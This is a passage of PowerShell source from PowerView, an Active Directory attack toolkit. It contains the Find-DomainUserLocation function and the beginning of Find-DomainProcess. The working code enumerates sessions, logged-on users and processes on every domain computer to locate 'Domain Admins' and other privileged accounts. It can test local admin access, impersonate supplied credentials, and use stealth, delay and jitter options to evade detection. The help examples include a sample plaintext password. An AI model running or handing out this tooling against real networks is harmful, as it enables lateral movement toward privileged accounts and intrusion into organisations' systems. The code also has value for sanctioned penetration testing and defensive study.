privileged).\n\n.PARAMETER UserAllowDelegation\n\nSwitch. Search for user accounts that are not marked as 'sensitive and not allowed for delegation'.\n\n.PARAMETER CheckAccess\n\nSwitch. Check if the current user has local admin access to computers where target users are found.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain and target systems.\n\n.PARAMETER StopOnSuccess\n\nSwitch. Stop hunting after finding after finding a target user.\n\n.PARAMETER Delay\n\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\n\n.PARAMETER Jitter\n\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\n\n.PARAMETER ShowAll\n\nSwitch. Return all user location results instead of filtering based on target\nspecifications.\n\n.PARAMETER Stealth\n\nSwitch. Only enumerate sessions from connonly used target servers.\n\n.PARAMETER StealthSource\n\nThe source of target servers to use, 'DFS' (distributed file servers),\n'DC' (domain controllers), 'File' (file servers), or 'All' (the default).\n\n.PARAMETER Threads\n\nThe number of threads to use for user searching, defaults to 20.\n\n.EXAMPLE\n\nFind-DomainUserLocation\n\nSearches for 'Domain Admins' by enumerating every computer in the domain.\n\n.EXAMPLE\n\nFind-DomainUserLocation -Stealth -ShowAll\n\nEnumerates likely highly-trafficked servers, performs just session enumeration\nagainst each, and outputs all results.\n\n.EXAMPLE\n\nFind-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local\n\nEnumerates Windows 7 computers in dev.testlab.local and returns user results for privileged\nusers in dev.testlab.local.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nFind-DomainUserLocation -Domain testlab.local -Credential $Cred\n\nSearches for domain admin locations in the testlab.local using the specified alternate credentials.\n\n.OUTPUTS\n\nPowerView.UserLocation\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.UserLocation')]\n    [CmdletBinding(DefaultParameterSetName = 'UserGroupIdentity')]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DNSHostName')]\n        [String[]]\n        $ComputerName,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerLDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerSearchBase,\n\n        [Alias('Unconstrained')]\n        [Switch]\n        $ComputerUnconstrained,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('OperatingSystem')]\n        [String]\n        $ComputerOperatingSystem,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ServicePack')]\n        [String]\n        $ComputerServicePack,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('SiteName')]\n        [String]\n        $ComputerSiteName,\n\n        [Parameter(ParameterSetName = 'UserIdentity')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $UserIdentity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $UserDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $UserLDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $UserSearchBase,\n\n        [Parameter(ParameterSetName = 'UserGroupIdentity')]\n        [ValidateNotNullOrEmpty()]\n        [Alias('GroupName', 'Group')]\n        [String[]]\n        $UserGroupIdentity = 'Domain Admins',\n\n        [Alias('AdminCount')]\n        [Switch]\n        $UserAdminCount,\n\n        [Alias('AllowDelegation')]\n        [Switch]\n        $UserAllowDelegation,\n\n        [Switch]\n        $CheckAccess,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $StopOnSuccess,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $Delay = 0,\n\n        [ValidateRange(0.0, 1.0)]\n        [Double]\n        $Jitter = .3,\n\n        [Parameter(ParameterSetName = 'ShowAll')]\n        [Switch]\n        $ShowAll,\n\n        [Switch]\n        $Stealth,\n\n        [String]\n        [ValidateSet('DFS', 'DC', 'File', 'All')]\n        $StealthSource = 'All',\n\n        [Int]\n        [ValidateRange(1, 100)]\n        $Threads = 20\n    )\n\n    BEGIN {\n\n        $ComputerSearcherArguments = @{\n            'Properties' = 'dnshostname'\n        }\n        if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }\n        if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }\n        if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }\n        if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }\n        if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }\n        if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }\n        if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }\n        if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }\n\n        $UserSearcherArguments = @{\n            'Properties' = 'samaccountname'\n        }\n        if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }\n        if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }\n        if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }\n        if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }\n        if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }\n        if ($PSBoundParameters['UserAllowDelegation']) { $UserSearcherArguments['AllowDelegation'] = $UserAllowDelegation }\n        if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }\n\n        $TargetComputers = @()\n\n        # first, build the set of computers to enumerate\n        if ($PSBoundParameters['ComputerName']) {\n            $TargetComputers = @($ComputerName)\n        }\n        else {\n            if ($PSBoundParameters['Stealth']) {\n                Write-Verbose \"[Find-DomainUserLocation] Stealth enumeration using source: $StealthSource\"\n                $TargetComputerArrayList = New-Object System.Collections.ArrayList\n\n                if ($StealthSource -match 'File|All') {\n                    Write-Verbose '[Find-DomainUserLocation] Querying for file servers'\n                    $FileServerSearcherArguments = @{}\n                    if ($PSBoundParameters['Domain']) { $FileServerSearcherArguments['Domain'] = $Domain }\n                    if ($PSBoundParameters['ComputerDomain']) { $FileServerSearcherArguments['Domain'] = $ComputerDomain }\n                    if ($PSBoundParameters['ComputerSearchBase']) { $FileServerSearcherArguments['SearchBase'] = $ComputerSearchBase }\n                    if ($PSBoundParameters['Server']) { $FileServerSearcherArguments['Server'] = $Server }\n                    if ($PSBoundParameters['SearchScope']) { $FileServerSearcherArguments['SearchScope'] = $SearchScope }\n                    if ($PSBoundParameters['ResultPageSize']) { $FileServerSearcherArguments['ResultPageSize'] = $ResultPageSize }\n                    if ($PSBoundParameters['ServerTimeLimit']) { $FileServerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n                    if ($PSBoundParameters['Tombstone']) { $FileServerSearcherArguments['Tombstone'] = $Tombstone }\n                    if ($PSBoundParameters['Credential']) { $FileServerSearcherArguments['Credential'] = $Credential }\n                    $FileServers = Get-DomainFileServer @FileServerSearcherArguments\n                    if ($FileServers -isnot [System.Array]) { $FileServers = @($FileServers) }\n                    $TargetComputerArrayList.AddRange( $FileServers )\n                }\n                if ($StealthSource -match 'DFS|All') {\n                    Write-Verbose '[Find-DomainUserLocation] Querying for DFS servers'\n                    # # TODO: fix the passed parameters to Get-DomainDFSShare\n                    # $ComputerName += Get-DomainDFSShare -Domain $Domain -Server $DomainController | ForEach-Object {$_.RemoteServerName}\n                }\n                if ($StealthSource -match 'DC|All') {\n                    Write-Verbose '[Find-DomainUserLocation] Querying for domain controllers'\n                    $DCSearcherArguments = @{\n                        'LDAP' = $True\n                    }\n                    if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain }\n                    if ($PSBoundParameters['ComputerDomain']) { $DCSearcherArguments['Domain'] = $ComputerDomain }\n                    if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server }\n                    if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential }\n                    $DomainControllers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname\n                    if ($DomainControllers -isnot [System.Array]) { $DomainControllers = @($DomainControllers) }\n                    $TargetComputerArrayList.AddRange( $DomainControllers )\n                }\n                $TargetComputers = $TargetComputerArrayList.ToArray()\n            }\n            else {\n                Write-Verbose '[Find-DomainUserLocation] Querying for all computers in the domain'\n                $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname\n            }\n        }\n        Write-Verbose \"[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)\"\n        if ($TargetComputers.Length -eq 0) {\n            throw '[Find-DomainUserLocation] No hosts found to enumerate'\n        }\n\n        # get the current user so we can ignore it in the results\n        if ($PSBoundParameters['Credential']) {\n            $CurrentUser = $Credential.GetNetworkCredential().UserName\n        }\n        else {\n            $CurrentUser = ([Environment]::UserName).ToLower()\n        }\n\n        # now build the user target set\n        if ($PSBoundParameters['ShowAll']) {\n            $TargetUsers = @()\n        }\n        elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) {\n            $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname\n        }\n        else {\n            $GroupSearcherArguments = @{\n                'Identity' = $UserGroupIdentity\n                'Recurse' = $True\n            }\n            if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain }\n            if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase }\n            if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server }\n            if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope }\n            if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize }\n            if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n            if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone }\n            if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential }\n            $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName\n        }\n\n        Write-Verbose \"[Find-DomainUserLocation] TargetUsers length: $($TargetUsers.Length)\"\n        if ((-not $ShowAll) -and ($TargetUsers.Length -eq 0)) {\n            throw '[Find-DomainUserLocation] No users found to target'\n        }\n\n        # the host enumeration block we're using to enumerate all servers\n        $HostEnumBlock = {\n            Param($ComputerName, $TargetUsers, $CurrentUser, $Stealth, $TokenHandle)\n\n            if ($TokenHandle) {\n                # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation\n                $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet\n            }\n\n            ForEach ($TargetComputer in $ComputerName) {\n                $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer\n                if ($Up) {\n                    $Sessions = Get-NetSession -ComputerName $TargetComputer\n                    ForEach ($Session in $Sessions) {\n                        $UserName = $Session.UserName\n                        $CName = $Session.CName\n\n                        if ($CName -and $CName.StartsWith('\\\\')) {\n                            $CName = $CName.TrimStart('\\')\n                        }\n\n                        # make sure we have a result, and ignore computer$ sessions\n                        if (($UserName) -and ($UserName.Trim() -ne '') -and ($UserName -notmatch $CurrentUser) -and ($UserName -notmatch '\\$$')) {\n\n                            if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName)) {\n                                $UserLocation = New-Object PSObject\n                                $UserLocation | Add-Member Noteproperty 'UserDomain' $Null\n                                $UserLocation | Add-Member Noteproperty 'UserName' $UserName\n                                $UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer\n                                $UserLocation | Add-Member Noteproperty 'SessionFrom' $CName\n\n                                # try to resolve the DNS hostname of $Cname\n                                try {\n                                    $CNameDNSName = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName\n                                    $UserLocation | Add-Member NoteProperty 'SessionFromName' $CnameDNSName\n                                }\n                                catch {\n                                    $UserLocation | Add-Member NoteProperty 'SessionFromName' $Null\n                                }\n\n                                # see if we're checking to see if we have local admin access on this machine\n                                if ($CheckAccess) {\n                                    $Admin = (Test-AdminAccess -ComputerName $CName).IsAdmin\n                                    $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin\n                                }\n                                else {\n                                    $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null\n                                }\n                                $UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation')\n                                $UserLocation\n                            }\n                        }\n                    }\n                    if (-not $Stealth) {\n                        # if we're not 'stealthy', enumerate loggedon users as well\n                        $LoggedOn = Get-NetLoggedon -ComputerName $TargetComputer\n                        ForEach ($User in $LoggedOn) {\n                            $UserName = $User.UserName\n                            $UserDomain = $User.LogonDomain\n\n                            # make sure wet have a result\n                            if (($UserName) -and ($UserName.trim() -ne '')) {\n                                if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName) -and ($UserName -notmatch '\\$$')) {\n                                    $IPAddress = @(Resolve-IPAddress -ComputerName $TargetComputer)[0].IPAddress\n                                    $UserLocation = New-Object PSObject\n                                    $UserLocation | Add-Member Noteproperty 'UserDomain' $UserDomain\n                                    $UserLocation | Add-Member Noteproperty 'UserName' $UserName\n                                    $UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer\n                                    $UserLocation | Add-Member Noteproperty 'IPAddress' $IPAddress\n                                    $UserLocation | Add-Member Noteproperty 'SessionFrom' $Null\n                                    $UserLocation | Add-Member Noteproperty 'SessionFromName' $Null\n\n                                    # see if we're checking to see if we have local admin access on this machine\n                                    if ($CheckAccess) {\n                                        $Admin = Test-AdminAccess -ComputerName $TargetComputer\n                                        $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin\n                                    }\n                                    else {\n                                        $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null\n                                    }\n                                    $UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation')\n                                    $UserLocation\n                                }\n                            }\n                        }\n                    }\n                }\n            }\n\n            if ($TokenHandle) {\n                Invoke-RevertToSelf\n            }\n        }\n\n        $LogonToken = $Null\n        if ($PSBoundParameters['Credential']) {\n            if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {\n                $LogonToken = Invoke-UserImpersonation -Credential $Credential\n            }\n            else {\n                $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet\n            }\n        }\n    }\n\n    PROCESS {\n        # only ignore threading if -Delay is passed\n        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {\n\n            Write-Verbose \"[Find-DomainUserLocation] Total number of hosts: $($TargetComputers.count)\"\n            Write-Verbose \"[Find-DomainUserLocation] Delay: $Delay, Jitter: $Jitter\"\n            $Counter = 0\n            $RandNo = New-Object System.Random\n\n            ForEach ($TargetComputer in $TargetComputers) {\n                $Counter = $Counter + 1\n\n                # sleep for our semi-randomized interval\n                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)\n\n                Write-Verbose \"[Find-DomainUserLocation] Enumerating server $Computer ($Counter of $($TargetComputers.Count))\"\n                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetUsers, $CurrentUser, $Stealth, $LogonToken\n\n                if ($Result -and $StopOnSuccess) {\n                    Write-Verbose \"[Find-DomainUserLocation] Target user found, returning early\"\n                    return\n                }\n            }\n        }\n        else {\n            Write-Verbose \"[Find-DomainUserLocation] Using threading with threads: $Threads\"\n            Write-Verbose \"[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)\"\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction\n            $ScriptParams = @{\n                'TargetUsers' = $TargetUsers\n                'CurrentUser' = $CurrentUser\n                'Stealth' = $Stealth\n                'TokenHandle' = $LogonToken\n            }\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params\n            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads\n        }\n    }\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Find-DomainProcess {\n<#\n.SYNOPSIS\n\nSearches for processes on the domain using WMI, returning processes\nthat match a particular user specification or process name.\n\nThanks to @paulbrandau for the approach idea.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction  \n\n.DESCRIPTION\n\nThis function enumerates all machines on the current (or specified) domain\nusing Get-DomainComputer, and queries the domain for users of a specified group\n(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the\nfunction enumerates any current processes running with Get-WMIProcess,\nsearching for processes running under any target user contexts or with the\nspecified -ProcessName. If -Credential is passed, it is passed through to\nthe underlying WMI commands used to enumerate the remote machines.\n\n.PARAMETER ComputerName\n\nSpecifies an array of one or more hosts to enumerate, passable on the pipeline.\nIf -ComputerName is not passed, the default behavior is to enumerate all machines\nin the domain returned by Get-DomainComputer.\n\n.PARAMETER Domain\n\nSpecifies the domain to query for computers AND users, defaults to the current domain.\n\n.PARAMETER ComputerDomain\n\nSpecifies the domain to query for computers, defaults to the current domain.\n\n.PARAMETER ComputerLDAPFilter\n\nSpecifies an LDAP query string that is used to search for computer objects.\n\n.PARAMETER ComputerSearchBase\n\nSpecifies the LDAP source to search through for computers,\ne.g. \"LDAP://OU=secret,DC=testlab,DC=local\". Useful for OU queries.\n\n.PARAMETER ComputerUnconstrained\n\nSwitch. Search computer objects that have unconstrained delegation.\n\n.PARAMETER ComputerOperatingSystem\n\nSearch computers with a specific operating system, wildcards accepted.\n\n.PARAMETER ComputerServicePack\n\nSearch computers with a specific service pack, wildcards accepted.\n\n.PARAMETER ComputerSiteName\n\nSearch computers in the specific AD Site name, wildcards accepted.\n\n.PARAMETER ProcessName\n\nSearch for processes with one or more specific names.\n\n.PARAMETER UserIdentity\n\nSpecifies one or more user identities to search for.\n\n.PARAMETER UserDomain\n\nSpecifies the domain to query for users to search for, defaults to the current domain.\n\n.PARAMETER UserLDAPFilter\n\nSpecifies an LDAP query string that is used to search for target users.\n\n.PARAMETER UserSearchBase\n\nSpecifies the LDAP source to search through for target users.\ne.g. \"LDAP://OU=secret,DC=testlab,DC=local\". Useful for OU queries.\n\n.PARAMETER UserGroupIdentity\n\nSpecifies a group identity to query for target users, defaults to 'Domain Admins.\nIf any other user specifications are set, then UserGroupIdentity is ignored.\n\n.PARAMETER UserAdminCount\n\nSwitch. Search for users users with '(adminCount=1)' (meaning are/were privileged).\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain and target systems.\n\n.PARAMETER StopOnSuccess\n\nSwitch. Stop hunting after finding after finding a target user.\n\n.PARAMETER Delay\n\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\n\n.PARAMETER Jitter\n\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\n\n.PARAMETER Threads\n\nThe number of threads to use for user searching, defaults to 20.\n\n.EXAMPLE\n\nFind-DomainProcess\n\nSearches for processes run by 'Domain Admins' by enumerating every computer in the domain.\n\n.EXAMPLE\n\nFind-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local\n\nEnumerates Windows 7 computers in dev.testlab.local and returns any processes being run by\nprivileged users in dev.testlab.local.\n\n.EXAMPLE\n\nFind-DomainProcess -ProcessName putty.exe\n\nSearchings for instances of putty.exe running on the current domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nFind-DomainProcess -Domain testlab.local -Credential $Cred\n\nSearches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials.\n\n.OUTPUTS\n\nPowerView.UserProcess\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]\n    [OutputType('PowerView.UserProcess')]\n    [CmdletBinding(DefaultParameterSetName = 'None')]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DNSHostName')]\n        [String[]]\n        $ComputerName,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerLDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerSearchBase,\n\n        [Alias('Unconstrained')]\n        [Switch]\n        $ComputerUnconstrained,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('OperatingSystem')]\n        [String]\n        $ComputerOperatingSystem,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ServicePack')]\n        [String]\n        $ComputerServicePack,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('SiteName')]\n        [String]\n        $ComputerSiteName,\n\n        [Parameter(ParameterSetName = 'TargetProcess')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ProcessName,\n\n        [Parameter(ParameterSetName = 'TargetUser')]\n        [Parameter(ParameterSetName = 'UserIdentity')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $UserIdentity,\n\n        [Parameter(ParameterSetName = 'TargetUser')]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $UserDomain,\n\n        [Parameter(ParameterSetName = 'TargetUser')]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $UserLDAPFilter,\n\n        [Parameter(ParameterSetName = 'TargetUser')]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $UserSearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('GroupName', 'Group')]\n        [String[]]\n        $UserGroupIdentity = 'Domain Admins',\n\n        [Parameter(ParameterSetName = 'TargetUser')]\n        [Alias('AdminCount')]\n        [Switch]\n        $UserAdminCount,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $StopOnSuccess,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $Delay = 0,\n\n        [ValidateRange(0.0, 1.0)]\n        [Double]\n        $Jitter = .3,\n\n        [Int]\n        [ValidateRange(1, 100)]\n        $Threads = 20\n    )\n\n    BEGIN {\n        $ComputerSearcherArguments = @{\n            'Properties' = 'dnshostname'\n        }\n        if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }\n        if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }\n        if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }\n        if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }\n        if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }\n        if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }\n        if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }\n        if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }\n\n        $UserSearcherArguments = @{\n            'Properties' = 'samaccountname'\n        }\n        if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }\n        if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }\n        if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }\n        if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }\n        if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }\n        if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }\n\n\n        # first, build the set of computers to enumerate\n        if ($PSBoundParameters['ComputerName']) {\n            $TargetComputers = $ComputerName\n        }\n        else {\n            Write-Verbose 